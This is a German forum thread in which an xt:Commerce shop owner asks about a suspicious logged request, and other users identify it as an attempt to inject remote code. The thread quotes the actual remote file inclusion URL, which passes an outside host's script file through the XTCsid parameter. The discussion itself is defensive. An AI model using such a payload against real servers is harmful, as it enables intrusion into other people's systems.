Kennt das einer von Euch? Was tun?

[Strubbel]

Hallo Zusammen,

in beobachte in den letzten Tag im Whois folgenden Eintrag bei der URL:

Zitat:

/index.php?XTCsid=http://cherrygirl.h18.ru/images/cs.txt?

Normalerweise wird ja nur der besuchte Link angezeigt (diesen gibts aber ganz sicher nicht bei uns), mir kommt das alles seltsam vor.

Kennt das jemand von Euch? Ist das der Versuch etwas auf meinem Server zu installieren/zu speichern, zu hacken?
Gestern hatte ich das mal ohne meine URL aufgerufen, da sah man dann jede Menge Script-Text

Was kann/sollte ich in dem Fall machen?

[Strubbel]

Keiner eine Idee?
Wenn man danach googelt werden recht viele Seiten dazu angezeigt, als wenn sich das einfach anheftet.
Kann mir nicht vorstellen, dass ich der einzige bin, dem das passiert - aber vielleicht einer der wenigen, dem das auffällt

[Numerobis]

Als Security-Laie vermute ich mal, daß da jemand Code einschleusen will. Er kennt halt nur die XTCsid. Als nächstes sucht er sich irgendeine andere Variable und irgendwann hat er vielleicht eine Schwachstelle gefunden.

Mich würde das schon auch interessieren...

Es versucht jemand mit der aufgerufenen URL über Deinen Server seinen Code auszuführen. Das klappt aber nicht. Taucht früher oder später in jedem Shop auf. Hatte ich auch des öfteren.
Auch beliebt, beim Suchfeld zusätzliche Javascript oder php Befehlen anzuhängen. Da hilft es, das Suchfeld auf ca. 25 oder 20 Zeichen zu beschränken. Obwohl der Shop so auch nicht unbedingt zu knacken ist.

@Numerobis Wenn Du nur Laie bist, mach keine Panik!

tuvalu